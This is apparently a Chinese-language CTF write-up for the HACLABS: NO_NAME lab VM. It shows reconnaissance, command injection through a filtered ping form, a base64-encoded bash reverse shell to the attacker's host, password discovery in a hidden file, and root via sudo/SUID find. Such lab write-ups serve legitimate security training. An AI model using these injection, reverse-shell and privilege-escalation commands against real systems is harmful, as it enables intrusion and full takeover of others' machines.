HACLABS: NO_NAME
HACLABS: NO_NAME
目录
1 信息收集
1.1 端口扫描
$ nmap -A -p - -T4 192.168.56.105 -oA hl
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 19:46 CST
Nmap scan report for 192.168.56.105
Host is up (0.00075s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
1.2 后台目录扫描
$ gobuster dir -u http://192.168.56.105/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x php
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/admin (Status: 200) [Size: 417]
/index.php (Status: 200) [Size: 201]
/server-status (Status: 403) [Size: 279]
/superadmin.php (Status: 200) [Size: 152]
1.2.1 目录分析
-
http://192.168.56.105/没啥东东 -
检查
http://192.168.56.105/admin页面源码发现ctf-01.jpg图片 -
下载
http://192.168.56.105/ctf-01.jpg到本地,并检查该图片的属性$ exiftool ctf-01.jpg ExifTool Version Number : 12.39 File Name : ctf-01.jpg Directory : . File Size : 1273 KiB File Modification Date/Time : 2020:01:08 03:47:07+08:00 File Access Date/Time : 2022:04:04 22:19:38+08:00 File Inode Change Date/Time : 2022:04:04 22:19:38+08:00 File Permissions : -rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.02 Resolution Unit : inches X Resolution : 300 Displayed Units X : inches Y Resolution : 300 Displayed Units Y : inches XMP Toolkit : Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 Format : image/jpeg Title : Print Metadata Date : 2020:01:08 01:13:40+05:30 Modify Date : 2020:01:07 19:43:46Z Create Date : 2020:01:08 01:13:40+05:30 Creator Tool : Adobe Illustrator CC 23.0 (Windows) Thumbnail Width : 256 Thumbnail Height : 184 Thumbnail Format : JPEG Thumbnail Image : (Binary data 9857 bytes, use -b option to extract) Instance ID : xmp.iid:a3412909-d8a8-6648-a5ed-31d06952aaad Document ID : xmp.did:a3412909-d8a8-6648-a5ed-31d06952aaad Original Document ID : uuid:5D20892493BFDB11914A8590D31508C8 Rendition Class : proof:pdf Derived From Instance ID : xmp.iid:5503d873-2c2c-9f48-8331-30e4ed0ca93d Derived From Document ID : xmp.did:5503d873-2c2c-9f48-8331-30e4ed0ca93d Derived From Original Document ID: uuid:5D20892493BFDB11914A8590D31508C8 Derived From Rendition Class : proof:pdf History Action : saved, saved History Instance ID : xmp.iid:84756610-1bdf-6b45-96c1-43e0a804304d, xmp.iid:a3412909-d8a8-6648-a5ed-31d06952aaad History When : 2020:01:07 19:14:17+05:30, 2020:01:08 01:13:40+05:30 History Software Agent : Adobe Illustrator CC 23.0 (Windows), Adobe Illustrator CC 23.0 (Windows) History Changed : /, / Startup Profile : Print Producer : Adobe PDF library 10.01 DCT Encode Version : 100 APP14 Flags 0 : [14], Encoded with Blend=1 downsampling APP14 Flags 1 : (none) Color Transform : YCbCr Image Width : 3509 Image Height : 2482 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1) Image Size : 3509x2482 Megapixels : 8.7 -
查看
http://192.168.56.105/superadmin.php页面发现可以执行ping命令
-
经过测试,发现只能执行以下命令:
# 构造payload POST /superadmin.php HTTP/1.1 Host: 192.168.56.105 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.56.105/ Content-Type: application/x-www-form-urlencoded Content-Length: 105 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 pinger=127.0.0.1+|+id&submitt=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2 # 得到执行结果 uid=33(www-data) gid=33(www-data) groups=33(www-data) -
此处没有什么思路,后面查看提示得知还可以查看当前页面的源代码:
命令注入小技巧:可以尝试是否可以获得当前页面源码
# 命令注入: 127.0.0.1 | cat superadmin.php # 得到superadmin.php页面源码 <form method="post" action=""> <input type="text" placeholder="Enter an IP to ping" name="pinger"> <br> <input type="submit" name="submitt"> </form> <?php if (isset($_POST['submitt'])) { $word=array(";","&&","/","bin","&"," &&","ls","nc","dir","pwd"); $pinged=$_POST['pinger']; $newStr = str_replace($word, "", $pinged); if(strcmp($pinged, $newStr) == 0) { $flag=1; } else { $flag=0; } } if ($flag==1){ $outer=shell_exec("ping -c 3 $pinged"); echo "<pre>$outer</pre>"; } ?>
2 命令注入利用
2.1 尝试反弹Shell
bash -i >& /dev/tcp/192.168.56.102/2333 0>&1
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMi8yMzMzIDA+JjE=" | base64 -d | bash -i
2.2 成功反强shell
$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 47822
bash: cannot set terminal process group (636): Inappropriate ioctl for device
bash: no job control in this shell
www-data@haclabs:/var/www/html$
2.3 切换python Shell
python3 -c "import pty;pty.spawn('/bin/bash')"
3 提权
3.1 尝试提权
-
查看当前系统的cap权限设置
www-data@haclabs:/var$ getcap -r / 2>/dev/null /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep /usr/bin/mtr-packet = cap_net_raw+ep -
查看
/etc/passwdwww-data@haclabs:/var$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin whoopsie:x:112:117::/nonexistent:/bin/false kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin saned:x:114:119::/var/lib/saned:/usr/sbin/nologin avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false haclabs:x:1000:1000:haclabs,,,:/home/haclabs:/bin/bash mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false yash:x:1001:1001:,,,:/home/yash:/bin/bash -
得到yash家目录下的flag信息:
www-data@haclabs:/home/yash$ cat flag1.txt Due to some security issues,I have saved haclabs password in a hidden file. -
搜索yash用户创建的文件,得到关键信息:
www-data@haclabs:/var/www$ find / -user 1001 2>/dev/null /home/yash /home/yash/flag1.txt /home/yash/.bashrc /home/yash/.cache /home/yash/.cache/motd.legal-displayed /home/yash/.profile /home/yash/.bash_history /home/yash/.gnupg /home/yash/.gnupg/private-keys-v1.d /home/yash/.local /home/yash/.local/share /home/yash/.local/share/nano /usr/share/hidden /usr/share/hidden/.passwd -
查看
/usr/share/hidden/.passwd文件内容www-data@haclabs:/var/www$ cat /usr/share/hidden/.passwd haclabs1234 -
得到haclabs家目录下的flag信息:
www-data@haclabs:/home/haclabs$ cat fla I am flag2 --------------- ---------------- --------
3.2 切换用户
-
利用上一步收集的信息,尝试切换用户
www-data@haclabs:/var/www$ su - haclabs Password: haclabs1234 haclabs@haclabs:~$ id uid=1000(haclabs) gid=1000(haclabs) groups=1000(haclabs),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare) -
查看haclabs用户所拥有的sudo权限
haclabs@haclabs:~$ sudo -l Matching Defaults entries for haclabs on haclabs: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User haclabs may run the following commands on haclabs: (root) NOPASSWD: /usr/bin/find -
查看当前拥有sid权限的命令
haclabs@haclabs:~$ find / -perm -u=s 2>/dev/null /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/sbin/pppd /usr/bin/pkexec /usr/bin/find /usr/bin/gpasswd /usr/bin/chfn /usr/bin/chsh /usr/bin/arping /usr/bin/passwd /usr/bin/traceroute6.iputils /usr/bin/sudo /usr/bin/newgrp
3.3 sudo提权
haclabs@haclabs:~$ sudo find /etc/passwd -exec /bin/bash \;
root@haclabs:~# id
uid=0(root) gid=0(root) groups=0(root)
root@haclabs:~# cd /root
root@haclabs:/root# cat flag3.txt
Congrats!!!You completed the challenege!
() ()
\ /
----------
root@haclabs:/root#
3.4 find提权
haclabs@haclabs:~$ find /etc/passwd -exec /bin/bash -p \; -quit
bash-4.4# id
uid=1000(haclabs) gid=1000(haclabs) euid=0(root) groups=1000(haclabs),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
- 默认情况下 bash 在执行时,如果发现 euid 和 uid 不匹配,会将 euid(即 suid) 强制重置为uid,使用
-p能参数可以保留euid
